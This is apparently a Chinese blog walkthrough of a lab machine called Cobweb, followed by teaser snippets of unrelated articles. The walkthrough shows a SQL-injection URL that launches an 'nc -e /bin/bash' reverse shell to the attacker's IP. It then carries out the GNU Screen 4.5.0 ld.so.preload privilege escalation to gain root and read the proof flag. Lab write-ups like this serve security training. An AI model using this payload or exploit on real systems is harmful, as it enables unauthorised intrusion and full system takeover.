Cobweb-中级

时间：2024-11-07 20:19:41浏览次数：1

标签：bin 4.4 中级 Cobweb usr rootshell root bash

源码泄露
可以直接看到源码存在sql注入

反弹shellpayload
http://192.168.167.162/phpinfo%22%20%20union%20select%20'system(%22nc%20-e%20/bin/bash%20192.168.45.250%2080%22);echo%2011122;'%20order%20by%201%20desc%20%20--%20

查看具有suid的命令
发现screen 命令存在漏洞GNU Screen 4.5.0 - Local Privilege Escalation

点击查看代码

sh-4.4# find / -perm -u=s -type f 2>/dev/null
/var/tmp/rootshell
/usr/bin/fusermount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/fusermount3
/usr/bin/screen-4.5.0
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/userhelper
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/libexec/cockpit-session
/usr/libexec/sssd/krb5_child
/usr/libexec/sssd/ldap_child
/usr/libexec/sssd/proxy_child
/usr/libexec/sssd/selinux_child

按照https://www.exploit-db.com/exploits/41154 里面的方法自己在本地写好 libhax.so 和 rootshell 其中编译rootshell的时候要加上 -static 不然运行不了同时执行的目录也要修改为/var/tmp 因为在/var/tmp 里面执行不了suid命令

成功提权

bash-4.4$ cd /var/tmp
bash-4.4$ ls
libhax.so  rootshell
bash-4.4$ cd /etc
bash-4.4$ unmask 000
bash: unmask: command not found
bash-4.4$ umask 000 # because
bash-4.4$ screen -D -m -L ld.so.preload echo -ne  "\x0a/var/tmp/libhax.so"
bash-4.4$ screen -ls 
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-apache.

bash-4.4$ cd /var/tmp
bash-4.4$ ls
libhax.so  rootshell
bash-4.4$ ls -al
total 788
drwxrwxrwt   2 root   root       40 Nov  7 07:16 .
drwxr-xr-x. 22 root   root     4096 Aug 27  2021 ..
-rwxrwxrwx   1 apache apache  15696 Nov  7 06:57 libhax.so
-rwsr-xr-x   1 root   root   785800 Nov  7 07:13 rootshell
bash-4.4$ ./rootshell 
sh-4.4# whoami
root
sh-4.4# cd /root
sh-4.4# ls
proof.txt
sh-4.4# cat proof.txt 
392388689a0ceba499668648185647f6

标签：bin,4.4,中级,Cobweb,usr,rootshell,root,bash
From： https://www.cnblogs.com/wssw/p/18533913

dvwa-sql注入中级
因为页面上只能选择相应数字查询，因此需要抓包进行注入；首先通过语句判断是字符型还是数字型：id=1and1=1--+id=1and1=2--+如图，两次返回结果不同，因此这是一个数字型注入。然后依照流程爆出当前表列数和回显位，爆出当前数据库名字（这一步就省略了）；接着，要利用information_sch......
银行业专业人员职业资格考试《公司信贷（中级）》机考真题精选及详解
2022年银行业专业人员职业资格考试《公司信贷（中级）》机考真题精选及详解1．[单选题]下列选项中，不属于保证担保的主要风险因素的是（）。A．未办理相关登记手续B．保证手续不完备C．公司互保D．虚假担保人答案：A解析：保证担保的主要风险包括：①保证人不具备担保资格；②保证人不具备担......
软考冲刺！中级网络工程师考点收藏背诵
中级网络工程师考点 R进制表示及互转：1. 进制间互转一般是无符号的数。2. 三位二进制的数可以转换成一位八进制的数，四位二进制的数可以转换成一位十六进制数。3. 十六进制数中的10-15用英文的A、B、C、D、E、F（或a—f）表示。冯 ·诺依曼计算机的组成-五大组成......
中级前端的面试秘籍
最近也是收到了不少小伙伴的私信，说是最近要找工作需要点技术理论支撑。我抽空整理了一些常见的面试题，供大家参考~，后续如果感觉还不错，我会出一篇从中级到高级进阶的面试秘籍HTML篇HTML5语义化html5语义化标签百度ife的h5语义化文章，讲得很好，很多不错的公司都会问语义化的问......
Java常见面试真题之中级进阶(HashMap篇)
前言本来想着给自己放松一下，刷刷博客，突然被几道面试题难倒！说说Hashtable与HashMap的区别？HashMap中的key我们可以使用任何类作为key吗？HashMap的长度为什么是2的N次方呢？HashMap与ConcurrentHashMap的异同？红黑树有哪几个特征？似乎有点模糊了，那就大概看一下面试题吧。......
Java面试真题之中级进阶（线程，进程，序列化，IO流，NIO）
前言本来想着给自己放松一下，刷刷博客，慕然回首，线程、程序、进程？Java序列化？Java中IO流？JavaIO与NIO的区别（补充）？似乎有点模糊了，那就大概看一下Java基础面试题吧。好记性不如烂键盘***12万字的java面试题整理***简述线程、程序、进程的基本概念。以及他们之间关系是什......
【软考中级笔记】软件设计师易混知识点归纳
一、计算机系统1.1计算机硬件1.2计算机软件1.软件可靠性、可维护性、可用性计算软件可靠性指标公式可靠性：MTTF/(1+MTTF)可用性：MTBF/(1+MTBF)可维护性：1/(1+MTTR)MTTF（MeanTimeToFailure）平均无故障时间MTTF=∑T1/NMTTR（Meantimetorepair）平均修复时间MTTR=∑(T......
2024年软件设计师中级（软考中级）详细笔记【7】面向对象技术（上）（分值10+）
目录前言第7章面向对象技术（上）7.1面向对象基础(3-4分）7.1.1面向对象的基本概念7.1.2面向对象分析（熟记）7.1.3面向对象设计7.1.4面向对象程序设计7.1.5面向对象测试7.2UML(3~4分)7.2.1事务7.2.2关系7.2.2.1多重度7.2.3UML中的的图结语前言在备考软件设......
大厂的JAVA经典面试题-初中级
前言本来想着给自己放松一下，刷刷博客，慕然回首，ﬁnal有哪些用法?static都有哪些用法?java的精度算法？java运算逻辑？异常处理？似乎有点模糊了，那就大概看一下Java基础面试题吧。好记性不如烂键盘***12万字的java面试题整理***ﬁnal有哪些用法?ﬁnal也是很多面试喜欢问的地方,但我觉......
5道大厂的JAVA经典面试题-初中级
前言本来想着给自己放松一下，刷刷博客，慕然回首，Java的四种引用，强弱软虚？泛型常用特点？Java创建对象有几种方式？有没有可能两个不相等的对象有相同的hashcode？深拷贝和浅拷贝的区别是什么?似乎有点模糊了，那就大概看一下5道Java基础面试题吧。好记性不如烂键盘~***12万字的java面试题......

Cobweb-中级

相关文章

赞助商

阅读排行